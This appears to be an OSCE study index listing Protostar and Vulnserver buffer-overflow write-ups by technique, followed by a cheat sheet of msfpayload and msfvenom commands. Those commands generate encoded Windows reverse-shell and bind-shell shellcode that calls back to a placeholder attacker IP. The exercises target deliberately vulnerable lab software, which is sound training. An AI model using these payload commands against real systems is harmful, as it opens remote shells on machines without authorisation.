Exploit Writeups

Exploit Exercise (Protostar)

| Module | Link | Note |
| --- | --- | --- |
| Stack0 | Stack BOF Intro | N/A |
| Stack1 | Stack BOF Basic1 | N/A |
| Stack2 | Stack BOF Basic2 | N/A |
| Stack3 | Stack BOF Basic3 | N/A |
| Stack4 | Stack BOF Basic4 | N/A |
| Stack5 | Stack BOF Shellcode | |
| Stack6 | Stack BOF ret2libc | ROP is not needed for OSCE |
| Stack7 | Stack BOF ret2.text | ROP is not needed for OSCE, but use this to learn the POP; POP; RET concept |

Vulnserver (Vulnserver)

| Series | Link | Command | Vulnerability | Note |
| --- | --- | --- | --- | --- |
| Part 1 | Read | N/A | N/A | Lab Setup |
| Part 2 | Read | TRUN | EIP Overwrite | |
| Part 3 | Read | GMON | SEH Overwrite + Short JMP + Egghunter | |
| Part 4 | Read | KSTET | EIP Overwrite + Short JMP + Egghunter | |
| Part 5 | Read | HTER | EIP Overwrite + Restricted Characters + Manual Offset Finding | |
| Part 6 | Read | GTER | EIP Overwrite + Socket Reuse Exploit | |
| Part 7 | Read | LTER | SEH Overwrite + Restricted Characters + Encoded Payloads | |

Links

Reviews

Github

Resources


Reverse Shell

Windows XP/Vista Ultimate

```
/pentest/exploits/framework/msfpayload windows/shell_reverse_tcp LHOST=192.168.x.x LPORT=443 C
```

Later Windows

```
/pentest/exploits/framework/msfpayload windows/shell_reverse_tcp LHOST=192.168.x.x LPORT=443 C

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.x.x LPORT=443 -a x86 --platform=win -e x86/alpha_mixed -f raw
```

Bind Shell

Windows XP/Vista Ultimate

```
msfpayload windows/shell_bind_tcp R > bind
msfencode -e x86/alpha_mixed -i bind -t perl
```

Later Windows

```
msfvenom -p windows/shell_bind_tcp -a x86 --platform=win -e x86/alpha_mixed -f perl
```